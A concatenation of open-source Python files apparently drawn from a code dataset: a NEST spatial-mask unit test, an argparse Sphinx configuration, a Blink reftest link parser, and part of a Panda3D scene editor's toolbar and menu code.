# Test that we get the correct node IDs with a azimuth rotation angle
# of 90 degrees when the mask does not contain the origin.
maskdict = {'lower_left': [1.0, 1.0],
'upper_right': [4.0, 2.0],
'azimuth_angle': 90.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((80, 81, 82, 83, 91, 92, 93, 94,)))
def test_RotatedBoxOutsideOrigin(self):
"""Test rotated box where the mask does not contain the origin."""
# 5x5x5 free layer on the integer lattice [-2, 2]^3; the box mask is
# anchored at the origin but placed entirely away from it.
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# First test that we get the correct node IDs when our mask does not
# contain the origin.
maskdict = {'lower_left': [-2.0, -1.0, 0.5],
'upper_right': [-0.5, -0.5, 2.0]}
mask = nest.CreateMask('box', maskdict)
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((9, 10, 34, 35,)))
# Test that we get the correct node IDs with a azimuth rotation angle of 45
# degrees when the mask does not contain the origin.
maskdict = {'lower_left': [-2.5, -1.0, 0.5],
'upper_right': [-0.5, -0.5, 2.5],
'azimuth_angle': 45.0}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((9, 10, 39, 40,)))
# Test that we get the correct node IDs with a polar rotation angle of 45
# degrees when the mask does not contain the origin.
maskdict = {'lower_left': [-1.5, -2.5, 0.5],
'upper_right': [-1.0, -0.5, 2.5],
'polar_angle': 45.0}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((4, 9, 30, 35,)))
def test_ConnectWithRotatedRectangleMask(self):
"""Test connection with rotated rectangle mask.
We have: lower_left = [-1.5, -0.5]
upper_right = [ 1.5, 0.5]
azimuth_angle = 45 degrees
Each source node should then connect to:
- The node in the same position in target layer
- The node above the node to the right of that position
- The node below the node to the left of the position.
So, if we have
sources: targets:
2 7 12 17 22 28 33 38 43 48
3 8 13 18 23 29 34 39 44 49
4 9 14 19 24 30 35 40 45 50
5 10 15 20 25 31 36 41 46 51
6 11 16 21 26 32 37 42 47 52
some example connections will be:
______
/ /
2 -> / 28 /
/ /
/_______ /
_______
/ 44 /
14 -> / 40 /
/ 36 /
/_______ /
"""
# Matching 5x5 grid layers for sources and targets.
source = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[5, 5],
extent=[5., 5.]))
target = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[5, 5],
extent=[5., 5.]))
# p = 1 makes the connectivity deterministic: every target inside the
# rotated mask is connected.
conndict = {'rule': 'pairwise_bernoulli',
'p': 1.,
'mask': {'rectangular': {'lower_left': [-1.5, -0.5],
'upper_right': [1.5, 0.5],
'azimuth_angle': 45.}}}
nest.Connect(source, target, conndict)
# Expected (source, target) pairs, sorted by source then target ID.
ref = [[1, 26], [2, 27], [2, 31], [3, 28], [3, 32], [4, 29], [4, 33],
[5, 30], [5, 34], [6, 27], [6, 31], [7, 28], [7, 32], [7, 36],
[8, 29], [8, 33], [8, 37], [9, 30], [9, 34], [9, 38], [10, 35],
[10, 39], [11, 32], [11, 36], [12, 33], [12, 37], [12, 41],
[13, 34], [13, 38], [13, 42], [14, 35], [14, 39], [14, 43],
[15, 40], [15, 44], [16, 37], [16, 41], [17, 38], [17, 42],
[17, 46], [18, 39], [18, 43], [18, 47], [19, 40], [19, 44],
[19, 48], [20, 45], [20, 49], [21, 42], [21, 46], [22, 43],
[22, 47], [23, 44], [23, 48], [24, 45], [24, 49], [25, 50]]
conns = nest.GetConnections()
connections = [[s, t] for s, t in zip(conns.sources(), conns.targets())]
# Compare each actual connection against the reference list pairwise.
for conn, conn_ref in zip(sorted(connections), ref):
self.assertEqual(conn, conn_ref)
def suite():
    """Return the test suite for the RotatedRectangularMask test case."""
    # unittest.makeSuite() is deprecated since Python 3.11 and removed in
    # Python 3.13; TestLoader.loadTestsFromTestCase() is the supported
    # equivalent and behaves identically (collects all test* methods).
    return unittest.TestLoader().loadTestsFromTestCase(RotatedRectangularMask)


if __name__ == "__main__":
    # Run the suite with verbose per-test output when invoked as a script.
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(suite())
| gpl-2.0 |
mozilla/fjord | vendor/packages/argparse-1.3.0/doc/source/conf.py | 84 | 7470 | # -*- coding: utf-8 -*-
#
# argparse documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 27 01:27:16 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# PEP 8: one import per line (kept for the commented-out sys.path snippet
# below, which needs both modules when enabled).
import os
import sys

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'argparse'
copyright = u'2011, Steven J. Bethard'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2'
# The full version, including alpha/beta/rc tags.
release = '1.2'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'argparsedoc'

# -- Options for LaTeX output --------------------------------------------------

# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'

# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
    ('index', 'argparse.tex', u'argparse Documentation',
     u'Steven J. Bethard', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Additional stuff for the LaTeX preamble.
#latex_preamble = ''

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'argparse', u'argparse Documentation',
     [u'Steven J. Bethard'], 1)
]

# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    ('index', 'argparse', u'argparse Documentation', u'Steven J. Bethard',
     'argparse', 'One line description of project.', 'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
texinfo_appendices = []
| bsd-3-clause |
dstockwell/blink | Tools/Scripts/webkitpy/layout_tests/reftests/extract_reference_link.py | 196 | 2272 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Utility module for reftests."""
from HTMLParser import HTMLParser
class ExtractReferenceLinkParser(HTMLParser):
    """HTML parser that collects reftest reference links.

    After feeding HTML, ``matches`` holds the hrefs of ``<link rel="match">``
    tags and ``mismatches`` the hrefs of ``<link rel="mismatch">`` tags.
    """

    def __init__(self):
        HTMLParser.__init__(self)
        self.matches = []
        self.mismatches = []

    def handle_starttag(self, tag, attrs):
        """Record the href of any <link> tag whose rel is match/mismatch."""
        if tag != "link":
            return
        attrs = dict(attrs)
        # PEP 8 (E713): use "x not in y" rather than "not x in y".
        if "rel" not in attrs:
            return
        if "href" not in attrs:
            return
        # rel can only take one value per tag, so the checks are exclusive.
        if attrs["rel"] == "match":
            self.matches.append(attrs["href"])
        elif attrs["rel"] == "mismatch":
            self.mismatches.append(attrs["href"])
def get_reference_link(html_string):
    """Extract reftest reference links from *html_string*.

    Returns:
        a tuple of two URL lists, (matches, mismatches).
    """
    link_parser = ExtractReferenceLinkParser()
    link_parser.feed(html_string)
    link_parser.close()
    return link_parser.matches, link_parser.mismatches
| bsd-3-clause |
mgracer48/panda3d | contrib/src/sceneeditor/sceneEditor.py | 6 | 76216 |
import sys
try: import _tkinter
except: sys.exit("Please install python module 'Tkinter'")
import direct
from direct.directbase.DirectStart import*
from direct.showbase.TkGlobal import spawnTkLoop
from Tkinter import *
from tkFileDialog import *
from direct.directtools.DirectGlobals import *
from direct.tkwidgets.AppShell import*
from SideWindow import*
from duplicateWindow import*
from lightingPanel import *
from seMopathRecorder import *
from seSession import *
from quad import *
from sePlacer import *
from seFileSaver import *
from propertyWindow import *
import seParticlePanel
from collisionWindow import *
from direct.gui.DirectGui import *
from MetadataPanel import *
from seBlendAnimPanel import *
from controllerWindow import *
from AlignTool import *
import os
import string
from direct.tkwidgets import Dial
from direct.tkwidgets import Floater
from direct.tkwidgets import Slider
from direct.actor import Actor
import seAnimPanel
from direct.task import Task
import math
#################################################################
# All scene and window objects will be stored in here.
# So, any event that will or needs to change their contents
# should be written in here or imported into here!
#################################################################
from dataHolder import* ## Use this thing to Save/load data.
AllScene = dataHolder()
class myLevelEditor(AppShell):
## overridden the basic app info ##
# AppShell metadata shown in the title bar and About dialog.
appname = 'Scene Editor - New Scene'
appversion = '1.0'
copyright = ('Copyright 2004 E.T.C. Carnegie Mellon U.' +
' All Rights Reserved')
contactname = 'Jesse Schell, Shalin Shodhan & YiHong Lin'
contactphone = '(412) 268-5791'
contactemail = 'etc-panda3d@lists.andrew.cmu.edu'
# Top-level Tk frame geometry and layout flags.
frameWidth = 1024
frameHeight = 80
frameIniPosX = 0
frameIniPosY = 0
usecommandarea = 0
usestatusarea = 0
padx = 5
pady = 5
sideWindowCount = 0
## Basic World default setting (For side window)
worldColor = [0,0,0,0]
lightEnable = 1
ParticleEnable = 1
basedriveEnable = 0
collision = 1
backface = 0
texture = 1
wireframe = 0
grid = 0
widgetVis = 0
enableAutoCamera = 1
# Input-controller state (see controllerWindow).
enableControl = False
controlType = 'Keyboard'
keyboardMapDict = {}
keyboardSpeedDict = {}
# Current selection state and undo/redo bookkeeping.
Scene=None
isSelect = False
nodeSelected = None
undoDic = {}
redoDic = {}
# Open sub-panels, keyed per node/actor.
animPanel = {}
animBlendPanel = {}
propertyWindow = {}
CurrentFileName=None #Holds the current scene file name
CurrentDirName=None # Holds the current file name without extension which is the path where file's data gets saved
Dirty=0 # Keeps track of whether there are any modifications that should be saved
def __init__(self, parent = None, **kw):
"""Build the editor: start the Tk loop if needed, create the top-level
frame and on-screen labels, and wire up all messenger event handlers."""
base.setBackgroundColor(0,0,0)
self.parent = parent
## Check TkTool is activated! ##
# If Panda was not started with want-tk, spawn our own Tk loop.
self.wantTK = config.GetBool('want-tk', 0)
if self.wantTK:
pass
else:
taskMgr.remove('tkloop')
spawnTkLoop()
## Set up window frame
INITOPT = Pmw.INITOPT
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
AppShell.__init__(self, parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
###### Put the directLabels on the screen to show the selected object Data
self.posLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.90),
text = "Position : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.hprLabel = DirectLabel(
relief = None,
pos = (-1.3 , 0, 0.80),
text = "Orientation: H: 00.00 P: 00.00 R: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.scaleLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.70),
text = "Scale : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.initialiseoptions(myLevelEditor)
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
######### Set the event handler ##########
# Messenger events from the sub-panels; each entry is [eventName, handler].
self.dataFlowEvents = [
## Event from Side Window
['SW_lightToggle',self.lightToggle],
['SW_collisionToggle',AllScene.toggleCollisionVisable],
['SW_particleToggle',self.toggleParticleVisable],
['SW_close',self.sideWindowClose],
## From Duplication Window
['DW_duplicating',self.duplicationObj],
## From Animation Panel
['AW_AnimationLoad',self.animationLoader],
['AW_removeAnim',self.animationRemove],
['AW_close',self.animPanelClose],
## From Blending Animation Window
['BAW_saveBlendAnim',self.animBlendPanelSave],
['BAW_removeBlendAnim',self.animBlendPanelRemove],
['BAW_renameBlendAnim',self.animBlendPanelRename],
['BAW_close',self.animBlendPanelClose],
## From Lighting Panel
['LP_selectLight', self.lightSelect],
['LP_addLight',self.addLight],
['LP_rename',self.lightRename],
['LP_removeLight',self.removeLight],
['LP_close',self.lightingPanelClose],
## From MotionPath Panel
['mPath_bindPathToNode',AllScene.bindCurveToNode],
['mPath_requestCurveList', self.requestCurveList],
['mPath_close', self.mopathClosed],
## From Property Window
['PW_removeCurveFromNode', AllScene.removeCurveFromNode],
['PW_removeAnimFromNode', AllScene.removeAnimation],
['PW_toggleLight', AllScene.toggleLightNode],
['PW_close', self.closePropertyWindow],
## From collisionWindow
['CW_addCollisionObj', AllScene.addCollisionObject],
## From AlignWindow
['ALW_close', self.closeAlignPanel],
['ALW_align', self.alignObject],
## From controllerWindow
['ControlW_close', self.closeInputPanel],
['ControlW_require', self.requestObjFromControlW],
['ControlW_controlSetting', self.setControlSet],
['ControlW_controlEnable', self.startControl],
['ControlW_controlDisable', self.stopControl],
['ControlW_saveSetting', AllScene.saveControlSetting],
## From Placer
['Placer_close', self.closePlacerPanel],
## From Particle Panel
['ParticlePanle_close', self.closeParticlePanel],
## From SEditor object which is a altered DirectSession
['SEditor-ToggleWidgetVis',self.toggleWidgetVis],
['SEditor-ToggleBackface',self.toggleBackface],
['SEditor-ToggleTexture',self.toggleTexture],
['SEditor-ToggleWireframe',self.toggleWireframe],
['ParticlePanel_Added_Effect',self.addParticleEffect],
['f11',self.loadFromBam],
['f12',self.saveAsBam],
]
#################################
### Collision detection
#################################
# Install a collision traverser so collision objects are traversed
# every frame.
self.cTrav = CollisionTraverser()
base.cTrav = self.cTrav
for event in self.dataFlowEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
# Scene-graph-explorer events (context menu actions, selection, etc.).
self.actionEvents = [
# Scene graph explorer functions
['SGE_changeName', self.changeName],
['SGE_Properties', self.openPropertyPanel],
['SGE_Duplicate', self.duplicate],
['SGE_Remove', self.remove],
['SGE_Add Dummy', self.addDummyNode],
['SGE_Add Collision Object', self.addCollisionObj],
['SGE_Metadata', self.openMetadataPanel],
['SGE_Set as Reparent Target', self.setAsReparentTarget],
['SGE_Reparent to Target', self.reparentToNode],
['SGE_Animation Panel', self.openAnimPanel],
['SGE_Blend Animation Panel', self.openBlendAnimPanel],
['SGE_MoPath Panel', self.openMoPathPanel],
['SGE_Align Tool', self.openAlignPanel],
['SGE_Flash', self.flash],
['SGE_madeSelection', self.selectNode],
['select',self.selectNode],
['deselect', self.deSelectNode],
['se_selectedNodePath',self.selectFromScene],
['se_deselectedAll',self.deselectFromScene],
]
''' All messages starting with "SGE_" are generated in seSceneGraphExplorer'''
for event in self.actionEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
camera.toggleVis()
self.selectNode(base.camera) ## Initially, we select camera as the first node...
def appInit(self):
#################################################################
# appInit(self)
# Initialize the application.
# This function will be called when you call AppShell's constructor
#################################################################
### Create SceneEditor Ver. DirectSession
self.seSession = SeSession()
self.seSession.enable()
SEditor.camera.setPos(0,-50,10)
# Sub-panel handles start as None; they are created on demand from the
# toolbar / menus and reset to None when closed.
self.placer=None
self.MopathPanel = None
self.alignPanelDict = {}
#self.quadview=QuadView()
self.lightingPanel = None
self.controllerPanel = None
self.particlePanel = None
### Create Side Window
# The side window mirrors the class-level world defaults defined above.
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.sideWindow.selectPage()
messenger.send('SGE_Update Explorer',[render]) ## Update the Scene Graph
pass
def getPhotoImage(self, name):
    """Resolve *name* against the Panda model-path and load it as a
    Tk PhotoImage (used for the toolbar icons)."""
    search_path = ConfigVariableSearchPath("model-path")
    resolved = search_path.findFile(Filename(name))
    return PhotoImage(file=resolved.toOsSpecific())
def createInterface(self):
    """Build the toolbar of icon buttons inside the top-level frame.

    Buttons are numbered from 1 in the order their icons are appended to
    self.image; buttonPushed() dispatches on that number, so the icon
    order here must stay in sync with the indices handled there.
    """
    # The interior of the toplevel panel
    interior = self.interior()
    #######################################################
    ### Creating the Buttons in the window frame
    #######################################################
    buttonFrame = Frame(interior)
    # Named icons, in dispatch order: 1 = New Scene ... 11 = Help.
    iconNames = ['new', 'open', 'save', 'model', 'actor', 'placer',
                 'mopath', 'lights', 'particles', 'control', 'help']
    self.image = [self.getPhotoImage('models/icons/%s.gif' % iconName)
                  for iconName in iconNames]
    # Twelve blank placeholder buttons (indices 12-23) reserved for
    # future features; buttonPushed() just prints a notice for them.
    self.image.extend(self.getPhotoImage('models/icons/blank.gif')
                      for _ in range(12))
    # enumerate(start=1) replaces the original hand-maintained counter;
    # the lambda's default argument captures the current index (avoids
    # the late-binding closure pitfall).
    for i, element in enumerate(self.image, start=1):
        button = Button(buttonFrame, image=element,
                        command=lambda n=i: self.buttonPushed(n))
        button.pack(fill=X, side=LEFT)
    buttonFrame.pack(fill=X, side=LEFT, expand=True)
def buttonPushed(self, buttonIndex):
#################################################################
# buttonPushed(self, buttonIndex)
# This function will handle all button events from the top level window.
# Take the button index as a reference to sense which button has been
# pushed. Indices 1-11 map to real features; 12-20 are placeholders
# for the blank toolbar buttons created in createInterface().
#################################################################
####
#### Change here to process the button event further.
####
if buttonIndex==1: # New Scene
self.newScene()
return
elif buttonIndex==2: # Open Scene
self.openScene()
return
elif buttonIndex==3: # Save Scene
self.saveScene()
return
elif buttonIndex==4: # Load Model
self.loadModel()
return
elif buttonIndex==5: # Load Actor
self.loadActor()
return
elif buttonIndex==6: # Open Placer
self.openPlacerPanel()
return
elif buttonIndex==7: # Open Mopath Panel
self.openMoPathPanel()
return
elif buttonIndex==8: # Open Lighting Panel
self.openLightingPanel()
return
elif buttonIndex==9: # Open Particle Panel
self.openParticlePanel()
return
elif buttonIndex==10:
self.openInputPanel()
return
elif buttonIndex==11: # Help
self.showAbout()
return
elif buttonIndex==12:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==13:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==14:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==15:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==16:
print "Your scene will be eliminated within five seconds, Save your world!!!, Number %d."%buttonIndex
return
elif buttonIndex==17:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==18:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==19:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==20:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
return
def createMenuBar(self):
# Creates default menus. Can be overridden or simply augmented
# Using button Add below
# Builds File / Edit / Panel / Help menus, then disables the entries
# that only make sense once a node has been selected.
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About...', command=self.showAbout)
## Creat stuff inside the "File"
self.menuBar.addmenuitem('File', 'command', 'Creat New Scene',
label='New Scene',
command=self.newScene)
self.menuBar.addmenuitem('File', 'command', 'Open a Scene',
label='Open Scene',
command=self.openScene)
self.menuBar.addmenuitem('File', 'command', 'Save a Scene',
label='Save Scene',
command=self.saveScene)
self.menuBar.addmenuitem('File', 'command', 'Save Scene as...',
label='Save as...',
command=self.saveAsScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Load Model',
label='Load Model',
command=self.loadModel)
self.menuBar.addmenuitem('File', 'command', 'Load Actor',
label='Load Actor',
command=self.loadActor)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Import a Scene',
label='Import...',
command=self.importScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Exit',
command=self.quit)
## Creat "Edit" on the menu and its stuff
self.menuBar.addmenu('Edit', 'Editting tools')
self.menuBar.addmenuitem('Edit', 'command', 'Un-do',
label='Undo...',
command=self.unDo)
self.menuBar.addmenuitem('Edit', 'command', 'Re-do',
label='Redo...',
command=self.reDo)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Deselect nodepath',
label='Deselect',
command=self.deSelectNode)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Add a Dummy',
label='Add Dummy',
command=self.addDummy)
self.menuBar.addmenuitem('Edit', 'command', 'Duplicate nodepath',
label='Duplicate',
command=self.duplicateNode)
self.menuBar.addmenuitem('Edit', 'command', 'Remove the nodepath',
label='Remove',
command=self.removeNode)
self.menuBar.addmenuitem('Edit', 'command', 'Show the object properties',
label='Object Properties',
command=self.showObjProp)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Show the Camera setting',
label='Camera Setting',
command=self.showCameraSetting)
self.menuBar.addmenuitem('Edit', 'command', 'Render setting',
label='Render Setting',
command=self.showRenderSetting)
## Creat "Panel" on the menu and its stuff
self.menuBar.addmenu('Panel', 'Panel tools')
self.menuBar.addmenuitem('Panel', 'command', 'Open Side Window',
label='Side Window',
command=self.openSideWindow)
self.menuBar.addmenuitem('Panel', 'command', 'Placer Panel',
label='Placer Panel',
command=self.openPlacerPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Animation Panel',
label='Animation Panel',
command=self.openAnimationPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Motion Path Panel',
label='Mopath Panel',
command=self.openMopathPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Lighting Panel',
label='Lighting Panel',
command=self.openLightingPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Particle Panel',
label='Particle Panel',
command=self.openParticlePanel)
self.menuBar.addmenuitem('Panel', 'separator')
self.menuBar.addmenuitem('Panel', 'command', 'Input control Panel',
label='Input device panel',
command=self.openInputPanel)
self.menuBar.pack(fill=X, side = LEFT)
## get "Menu" items in order to control the entry status
self.menuFile = self.menuBar.component('File-menu')
self.menuEdit = self.menuBar.component('Edit-menu')
self.menuPanel = self.menuBar.component('Panel-menu')
## Disable entries when user doesn't select anything
if not self.isSelect:
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
self.menuPanel.entryconfig('Animation Panel', state=DISABLED)
self.menuPanel.entryconfig('Side Window', state=DISABLED)
def onDestroy(self, event):
#################################################################
# If you have open any thing, please rewrite here!
#################################################################
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
pass
def closeAllSubWindows(self):
#################################################################
# closeAllSubWindows(self)
# except side window. this function will close all sub window if there is any.
#################################################################
if self.lightingPanel != None:
self.lightingPanel.quit()
if self.placer != None:
self.placer.quit()
if self.MopathPanel != None:
self.MopathPanel.quit()
if self.particlePanel != None:
self.particlePanel.quit()
if self.controllerPanel != None:
self.controllerPanel.quit()
list = self.animPanel.keys()
for index in list:
self.animPanel[index].quit()
list = self.animBlendPanel.keys()
for index in list:
self.animBlendPanel[index].quit()
list = self.propertyWindow.keys()
for index in list:
self.propertyWindow[index].quit()
list = self.alignPanelDict.keys()
for index in list:
self.alignPanelDict[index].quit()
self.animPanel.clear()
self.animBlendPanel.clear()
self.propertyWindow.clear()
self.alignPanelDict.clear()
return
## Processing message events
def makeDirty(self):
self.Dirty=1
def removeLight(self, lightNode):
#################################################################
# removeLight(self, lightNode)
# This function will be called when user try to remove the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to remove the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list = AllScene.removeObj(lightNode)
if self.lightingPanel != None:
self.lightingPanel.updateList(list)
return
def lightRename(self,oName, nName):
#################################################################
# lightRename(self,oName, nName)
# This function will be called when user try to rename the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to rename the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list, lightNode = AllScene.rename(oName, nName)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
return
def lightSelect(self,lightName):
#################################################################
# lightSelect(self,lightName)
# This function will be called when user try to select the light from lightingPanel
# (by sending out the message)
